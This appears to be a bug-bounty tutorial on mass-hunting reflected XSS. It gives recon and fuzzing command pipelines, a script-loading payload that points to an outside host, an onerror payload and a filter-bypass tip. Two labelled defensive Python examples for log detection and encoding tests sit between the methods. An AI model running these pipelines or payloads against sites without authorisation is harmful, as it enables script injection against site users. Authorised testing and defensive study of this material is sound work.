Automating RXSS (reflected XSS) hunting


Az3m

- Collect subdomains (AssetFinder, SubFinder, Amass, Find-domain, Google dorking).

- Find which of the subdomains are live (`httprobe` by Tomnomnom, or `httpx`): `cat subdomains.txt | httprobe | tee -a host.txt`

- Use your payloads, for example: `<script/src=//NJ.₨></script>`

- Your report, if not accepted

- Gather endpoints from both a crawler and the Wayback Machine, appending to the same file (run them one after the other rather than with `&`, so the two `tee -a` writers do not interleave): `cat host.txt | crawler | tee -a endpoint.txt; cat host.txt | waybackurls | tee -a endpoint.txt`

- After collecting all 50 lakh (5 million) endpoints, I fuzzed every parameter for XSS with the help of the tool qsreplace. The command used was (the payload is single-quoted so the shell passes the double quote and angle brackets through unchanged):

`cat endpoint.txt | qsreplace '"><img src=x onerror=alert(1)>' | tee -a xss_fuzz.txt`

After running that command, I had to check how many of those parameters reflect the payload back into the response as plain text (unencoded) and how many do not. So I wrote a tool named FREQ, which is also available in my GitHub repo. It sends a request for each URL and reports the ones whose response contains the payload, which are the affected URLs. The command used was: `cat xss_fuzz.txt | freq | tee -a possible_xss.txt`
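The fuzzing step above sends the same payload to every parameter of every endpoint, which is also exactly what a defender sees in the access log. The following is an added example, not part of the original post or of the qsreplace/FREQ tools: it parses constructed combined-format access log lines, URL-decodes the request target, and flags requests carrying the probe patterns from this post (`onerror=` handlers, `<script/src=`, an attribute or tag closed and followed by a new tag). The log lines, IP addresses and the `example.invalid` host are constructed sample data.

```python
"""Added example (not from the original post): flag reflected-XSS probes,
such as the qsreplace payload used above, in web server access logs.
Assumes nginx/Apache combined log format; the lines below are constructed."""
import re
from urllib.parse import unquote

# Constructed sample log lines in combined log format; not real traffic.
SAMPLE_LOG = r'''
203.0.113.10 - - [10/Jan/2024:12:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [10/Jan/2024:12:00:02 +0000] "GET /search?q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 640 "-" "curl/8.0"
203.0.113.12 - - [10/Jan/2024:12:00:03 +0000] "GET /item?id=42&ref=%3Cscript%2Fsrc%3D%2F%2Fexample.invalid%3E%3C%2Fscript%3E HTTP/1.1" 200 700 "-" "python-requests/2.31"
203.0.113.13 - - [10/Jan/2024:12:00:04 +0000] "GET /profile?name=O%27Brien HTTP/1.1" 200 300 "-" "Mozilla/5.0"
'''

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns that characterise the probes used in this post; applied to the
# URL-decoded request target so that percent-encoding does not hide them.
XSS_PATTERNS = [
    re.compile(r'<\s*script[\s/>]', re.I),              # <script ...> or <script/src=
    re.compile(r'(?:^|[\s"\'/])on\w+\s*=', re.I),       # event handler attribute, e.g. onerror=
    re.compile(r'["\'>]\s*<\s*[a-z]', re.I),            # break out of attribute/tag, open a new tag
]


def decode_target(target: str) -> str:
    """URL-decode twice so that double-encoded probes are visible as well."""
    return unquote(unquote(target))


def find_xss_probes(log_text: str) -> list:
    """Return one record per log line whose decoded target matches a probe pattern."""
    hits = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        decoded = decode_target(m.group("target"))
        rules = [p.pattern for p in XSS_PATTERNS if p.search(decoded)]
        if rules:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "target": decoded,
                "status": int(m.group("status")),
                "rules": rules,
            })
    return hits


if __name__ == "__main__":
    for hit in find_xss_probes(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["target"]}  matched {len(hit["rules"])} rule(s)')
```

Lines with a 200 status and a matching target are the ones to look at first: they show the probe reached application code rather than being rejected at the edge. The `O'Brien` line is kept as a deliberate non-match so the quote-then-tag rule does not fire on ordinary apostrophes.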

### Second method
cleanP: github.com/raoufmaklouf/c…

injectP: github.com/raoufmaklouf/i…

XSS.yaml: gist.githubusercontent.com/raoufmaklouf/7…

- Single target: `gau target.com | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt`

- A list of already collected endpoints: `cat AllEndPoint.txt | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt`
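Both pipelines above, and the FREQ step in the first method, rely on one idea: inject a marker containing a double quote and a `>`, then match responses that contain that marker unchanged, because an application that HTML-encodes its output turns those characters into `&quot;` and `&gt;`. The following is an added example, not part of the original post or of the cleanP/injectP/XSS.yaml tools: it shows that check as a regression test you can run against your own handlers, with a hypothetical handler that echoes a parameter raw beside the same handler with output encoding. The handler names and the `?q=` parameter are assumptions; the marker values are the ones from the post.

```python
"""Added example (not from the original post): the reflection check behind
`httpx -ms 'T"rSpGeUMo>7N'` written as a test against two hypothetical handlers.
Assumes the parameter is named q; render_vulnerable/render_fixed are illustrative."""
import html
from urllib.parse import parse_qs, unquote, urlsplit

MARKER_ENCODED = "T%22rSpGeUMo%3E7N"    # form sent on the wire (from the post)
MARKER = unquote(MARKER_ENCODED)         # T"rSpGeUMo>7N: must never appear raw in HTML


def _param(url: str, name: str = "q") -> str:
    """First value of the named query parameter, percent-decoded as a server would."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url: str) -> str:
    """Hypothetical handler that echoes ?q= straight into an attribute (the bug class)."""
    return f'<input name="q" value="{_param(url)}">'


def render_fixed(url: str) -> str:
    """Same handler with output encoding; quote and '>' become &quot; and &gt;."""
    return f'<input name="q" value="{html.escape(_param(url), quote=True)}">'


def reflects_raw(body: str, marker: str = MARKER) -> bool:
    """True when the marker survived byte-for-byte, i.e. its metacharacters were not encoded."""
    return marker in body


def reflects_encoded(body: str, marker: str = MARKER) -> bool:
    """True when the marker is present only in its HTML-entity form (the safe outcome)."""
    return marker not in body and html.escape(marker, quote=True) in body


def check_handlers(base: str = "https://app.example/search") -> dict:
    """Run the marker check against both handlers; a raw reflection is a failing result."""
    url = f"{base}?q={MARKER_ENCODED}"
    results = {}
    for name, handler in (("vulnerable", render_vulnerable), ("fixed", render_fixed)):
        body = handler(url)
        results[name] = {
            "raw": reflects_raw(body),
            "encoded": reflects_encoded(body),
            "body": body,
        }
    return results


if __name__ == "__main__":
    for name, r in check_handlers().items():
        verdict = "FAIL (raw reflection)" if r["raw"] else "ok (encoded)"
        print(f"{name:10s} {verdict}: {r['body']}")
```

The marker deliberately carries no `<script` or event handler, so a match tells you only that the encoding boundary is missing; that is the property to fix (encode at the point of output, as `render_fixed` does), and it holds no matter which path the value arrived by.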

### Third method
First of all, I enumerated all subdomains of target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and
then brute-forced subdomains with [knockpy](https://github.com/guelfoweb/knock).
Then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS, and [gf](https://github.com/tomnomnom/gf) to pick out the likely XSS parameters.
After sorting the URLs I used [KXSS](https://github.com/Emoe/kxss)
and [Dalfox](https://github.com/hahwul/dalfox). Bad luck, I got nothing.

### Fourth method
Reading robots.txt got me 4 XSS reports: https://mirror-medium.com/?m=https://medium.com/@c0nqr0r/reading-robots-txt-got-me-4-xss-reports-9fd2234c635f&fbclid=IwAR1Z9wF54pIr0l3uLd9xLxiip3gbiWPDo-CFkNaGtrM7FTrLXDBzfI8pqKw

### Tips
- If the XSS does not execute when submitted through the UI, try inserting it through the API.
- It can then fire on the UI, since many filters are not applied on that path.

Other classes worth checking on the same targets: business logic, registration vulnerabilities, 2FA bypass, authentication, IDOR. Checklist: https://github.com/Az0x7/vulnerability-Checklist
